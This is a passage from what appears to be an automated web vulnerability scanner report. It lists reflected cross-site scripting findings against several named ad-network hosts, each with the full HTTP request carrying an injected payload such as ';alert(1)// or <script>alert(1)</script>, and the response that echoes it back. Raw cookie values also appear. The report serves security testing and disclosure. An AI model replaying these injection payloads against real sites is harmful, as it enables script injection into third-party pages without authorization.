Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:02:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:02:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:02:21 GMT
Content-Length: 1294

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZ
...[SNIP]...
KQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-85d8c9'-alert(1)-'aca8e4c3d50&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+
...[SNIP]...

3.68. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0961'%3balert(1)//77258745e1c was submitted in the redir parameter. This input was echoed as e0961';alert(1)//77258745e1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.yearbook&size=300x250&imp_id=cm-10306552516_1311271251,11fda490648f83c&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbook%2Fford_ron_071911%3Bnet%3Dcm%3Bu%3D%2Ccm-10306552516_1311271251%2C11fda490648f83c%2Cgames%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D218732%3Bcontx%3Dgames%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1520731557%3Fe0961'%3balert(1)//77258745e1c HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.I>u3?!7G'6v$WPt[fR4#aoQ.`e#:wJBP@1>+^X$?SUr+(fV+'zvLnT#=)OqIw

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIz34QChgCIAIoAjDz0qHxBBDz0qHxBBgB; path=/; expires=Wed, 19-Oct-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb477086=5_[r^208WM^9#a*>bPMv^E$G`?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPxSPy36XVUUdg472aqBQblpzaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAAoBABAgUCAQUAAAAAUB_tOAAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271283%29%3Buf%28%27c%27%2C+39654%2C+1311271283%29%3Buf%28%27r%27%2C+425550%2C+1311271283%29%3Bppv%281279%2C+%272109186109648637716%27%2C+1311271283%2C+1311876083%2C+39654%2C+24039%29%3Bppv%285150%2C+%272109186109648637716%27%2C+1311271283%2C+1311357683%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA; path=/; expires=Fri, 22-Jul-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LEhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?Werk8MLb?d'RcKEk]=lqA^u!V!N%k=JTSWLp1V1MQf1/f-Nd>; path=/; expires=Wed, 19-Oct-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:01:23 GMT
Content-Length: 413

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911;net=cm;u=,cm-10306552516_1311271251,11fda490648f83c,games,ax.80-bz.25;;cmw=owl;sz=300x250;net=cm;ord1=218732;contx=games;an=80;dc=w;btg=bz.25;ord=1520731557?e0961';alert(1)//77258745e1c">
...[SNIP]...

3.69. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16024/128483/lifescript-470x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb81b'%3balert(1)//5d194e610e6 was submitted in the mpck parameter. This input was echoed as bb81b';alert(1)//5d194e610e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16024/128483/lifescript-470x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16024-128483-16880-2%3Fmpt%3D80352151311276189929bb81b'%3balert(1)//5d194e610e6&mpt=80352151311276189929&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/q%3B243260174%3B0-0%3B0%3B31210306%3B6510-470/250%3B42925500/42943287/1%3B%3B%7Eokv%3D%3Bpath%3Dhealth/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D%21webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D1%3Btile%3D16%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;sz=470x250;ord=101352252258050
Cookie: svid=396408271523; __utmz=183366586.1305458947.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.647930298.1305458947.1305458947.1305458947.1; mojo3=16024:16880

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:41 GMT
Server: Apache
Last-Modified: Thu, 30 Jun 2011 17:46:51 GMT
ETag: "4a9bc3-461e-4a6f17c6278c0"
Accept-Ranges: bytes
Content-Length: 18628
Content-Type: application/x-javascript

document.write( "<style>" );
document.write( ".selectOptional {display:none;}" );
document.write( ".headline_blockAD_____78296 {position:absolute;left:0px;top:10px;width:470px;height:30px;font-famil
...[SNIP]...
dhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;~sscs=?http://altfarm.mediaplex.com/ad/ck/16024-128483-16880-2?mpt=80352151311276189929bb81b';alert(1)//5d194e610e6?mpre=' + encodeURIComponent(url);
} else {
var redir = '';
if (RedirectURLAD_____78296 == '**' + 'redirecturl**') {
RedirectURLAD_____78296 = '';
}

try {
var ar = (docum
...[SNIP]...

3.70. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16024/128483/lifescript-470x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 408db'%3balert(1)//f589db99a52 was submitted in the mpvc parameter. This input was echoed as 408db';alert(1)//f589db99a52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16024/128483/lifescript-470x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16024-128483-16880-2%3Fmpt%3D80352151311276189929&mpt=80352151311276189929&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/q%3B243260174%3B0-0%3B0%3B31210306%3B6510-470/250%3B42925500/42943287/1%3B%3B%7Eokv%3D%3Bpath%3Dhealth/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D%21webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D1%3Btile%3D16%3B%7Esscs%3D%3f408db'%3balert(1)//f589db99a52 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;sz=470x250;ord=101352252258050
Cookie: svid=396408271523; __utmz=183366586.1305458947.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.647930298.1305458947.1305458947.1305458947.1; mojo3=16024:16880

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:59 GMT
Server: Apache
Last-Modified: Thu, 30 Jun 2011 17:46:51 GMT
ETag: "4a9bc3-461e-4a6f17c6278c0"
Accept-Ranges: bytes
Content-Length: 18656
Content-Type: application/x-javascript

document.write( "<style>" );
document.write( ".selectOptional {display:none;}" );
document.write( ".headline_blockAD_____78296 {position:absolute;left:0px;top:10px;width:470px;height:30px;font-famil
...[SNIP]...
2943287/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;~sscs=?408db';alert(1)//f589db99a52' != ('<mp' + 'vc/>
...[SNIP]...

3.71. http://jlinks.industrybrains.com/jsct [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 8b1a3<script>alert(1)</script>88ce88e2adb was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=918&ct=SCMAGAZINE_ROS8b1a3<script>alert(1)</script>88ce88e2adb&num=4&layt=624x300&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 20:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 22 Jul 2011 20:13:23 GMT
Content-Type: application/x-javascript
Content-Length: 85

// Error: Unknown old section SCMAGAZINE_ROS8b1a3<script>alert(1)</script>88ce88e2adb

3.72. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8d8ec<script>alert(1)</script>5143365a5aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=918&ct=SCMAGAZINE_ROS&num=4&layt=624x300&fmt=simp&8d8ec<script>alert(1)</script>5143365a5aa=1 HTTP/1.1
Host: jlinks.industrybrains.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 20:13:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 22 Jul 2011 20:13:44 GMT
Content-Type: application/x-javascript
Content-Length: 69

// Error: Unknown parameter 8d8ec<script>alert(1)</script>5143365a5aa

3.73. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 1cc9e<script>alert(1)</script>3aea9239800 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G076081cc9e<script>alert(1)</script>3aea9239800 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e4a9497&1&10165&4e23b001&1f1a384c105a2f365a2b2d6af5f27c36; rtc_Ua1q=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; rsiPus_txcj="MLsXtTENJApvJ5G2CtKgxPEJrF4+5C1lsBnrgEjvGi+eSZMchfnrP39kON1J8Dw2ez7PupwpYPP5yKMjmbdmh81UPDhyhpxyS7MO2AwR+rZMYnGA4GC9O9QvN1US1tLIl+LPn43PjJ7qQS/pGvY4QhuHwB8K95+qPEnYJnhaG4+IlaKd2qXTFD5NPxzH14rtpxNxhK/Qq6XR1GVuuD0MACeK9YttnZMRVKNyz145LDIp6sgKiL4Tv8VDrtPM20t4ks65WY2j91xoadjPpjUc7aRhCibeE9+Q0gW1g+GMarobzm3uSc9hihqHb2OuTNZp6HvcfpcSolGNaBNFn6mz9S4GdSRXyLKhtThdQvqgzDnGfGijXgpw4hpzJ+XSnKhaapQctKTTGePlLpcjX6DJ0AbryUPeOOvMt1vqCrWGGbdBnJPWRbmfpSBp+b4N/yIvO8wsWNsUJfELOwJAhvSkB6UA0wJyhIbDEgmaojrzG2g4qtKugltluN2yUYG6vo5rVBvqVcdeOkOkKCZ55Jpdoa/Ha3n0gD14Lny/vNlttrvJLIOJyQuk+fVFtklYOCKaHODtYdsy6UCkT1YKa2maAXdUxNfwJEP6X+bmUSljkLBrbBqPr2B/mk8xFnC4OuI21eh19jz9NrrOuYdaelXVAFfsVYl1N5RHr4poGi0gbBQ3IXaDUUmdxbkCMQjwFsM9XRo+GqH6DuFZyinGxc1pmKcjHZyEZAzw7emay24dMXff2kFeAIfeWnJVoykCyOShHGv6o9h7zZATWIiMyYHQGAnfWEjK9lqylOGKcFHzI1vIEluQgEUI6oDFaLn09Yd8x5HU4LR9I5pAso5hjheZzNKx9GihZwttVIKhHi+7RUxzyQi5WprC/6ARua3XbXuEnwW38MgmC1FcFf2OLrmBTx0NgCfVJ37CxnAT0fGeKaqG9PD6njWPiMNQLpbp1MeSeEIc2ooFnljQQIjq4cujHdr+masfVHuefX0AyFNi/9G8eqNYD/MbSh+5TYW7YTujwPvcm9aBPkFiSjNIveSmBaLoO7RN5jAO/tNDQDdP9QxJWrR4GR76w4sTNRGscEB4YhZiyUTfMuLGuFDDO3LxISk1Vc15oBSA20Uu/imPI820TKoKDPFXxBZPuS2W7/TagpYZOhHUlE1Jhh4hDGMH3+k3OUVHfxA8EFcwLOXecXXGXdkj7OM2CoEWN+1UGLnlNH7DOc6Q8N46vAfkGRXYuoYP29k5ad+fsqXZhbC8LPInaUOdVqv3WPMYA0GEjG8Dc/ycsOJ9YDVJiMpf5jiFRC5gqfpBHEExyKw/xQQF37oOrYfVFI8EMhDDyTZxMnM+QdZo2EL4ThE3vVQz6r6KEbMOAGcFNkhxJO1XNzL4WKOWGHo/kAIaQwPLJlofJFvV34UOEyDjoQodhdauy073JrFFp5liMGyUFlDu9DpafuqmexP1pihpMrhBicoTgU/7oSB3SEeXMCqbty3JnBi96+CSk8KsIK5Axz+lIxx5JsH17oVJwi6n1lmSvUdbQ6V5i4NYrwOD76lwBXRBoTMg4X14dFF1dnGGRQd/hgg2B99u3e1qIw=="; rsi_us_1000000="pUMV4iuj8AcY7Q8QOgkladXB1TRr//xCUITuigauJ9I1hpGbRPyE9/moC5Ct9Zr2V+KcN28bcNEsiW5d363e636BdNSVQC/TFrG/Tgq2tdZ0Zc1ptoz1zPdLwvfOTsNmL0NYJ5hl+giFOQ1+ti9+aDDqaViYPDilprKFjx/F2brW9Y/6g8PxzmcxvzSq8w5e0XUy54YE5WZ1r2vdyJigY70HWjK/gHHKu4y7vaCcJVQR5IUh5JOxJYptVvUDUKSvGo3043ti3VrBB6/ZDm/E3kVw8NZsEZq+S+iMju4zgJ6t7BVlCBL10rgh1Wv8BsxAdIowPpzmreNZ5TXpCqNe3TgzwzEtW+hQQmJygv+YNKsBKkzw6EtWfqGapxHZjHBNe4DYY8obfvpBVVkkZbQELHGZpJGFAI8uOdi2NXWMu1ZIv1f0DjJL+KKl0xgowuJekkH8RR3v/YX8c7iApavHR3wYiq43Qt5rE+aoaNZ8SOE+Zze+2/I4SWibqORMPe+qL5wj9GnJqmQXTyvze4jDQ9od4VAcK+W4h0dPP5lqoQNsh7iHICxWyM9wTLOY+InCKjXeOgB/7UKCPigYzGhYA8WwvKv5vJuN+9tZM5HBDgfIcQCZ+gjnKW2ufJkpPuCLplmbXbHumxiCMN9YrMT1ER+KkX24MOvzh3DemF0TPpeRjxfXHktbkyCo3Lt9ZnO2Ij85s/vr9BDe58vpE2euQ8K9dZmZ4gMFQumMg5g563XiKHsHYgMSGs5+xmX/nvEgnRr+jJ1FRcOdNaEarcO